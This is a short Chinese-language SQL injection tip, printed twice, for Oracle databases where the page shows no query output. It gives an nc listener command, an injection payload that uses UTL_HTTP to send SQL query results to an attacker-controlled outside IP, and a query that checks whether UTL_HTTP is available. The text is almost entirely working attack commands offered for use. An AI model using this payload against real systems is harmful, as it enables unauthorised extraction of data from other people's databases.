很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下:
第一步:使用nc监听数据
nc -lvvp 8888
第二步:反弹数据信息
and UTL_HTTP("http://IP:8888/" || (SQL语句))=1--
判断是否存在UTL_HTTP
select count(*) from all_objects where object_name="UTL_HTTP"
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下:
第一步:使用nc监听数据
nc -lvvp 8888
第二步:反弹数据信息
and UTL_HTTP("http://IP:8888/" || (SQL语句))=1--
判断是否存在UTL_HTTP
select count(*) from all_objects where object_name="UTL_HTTP"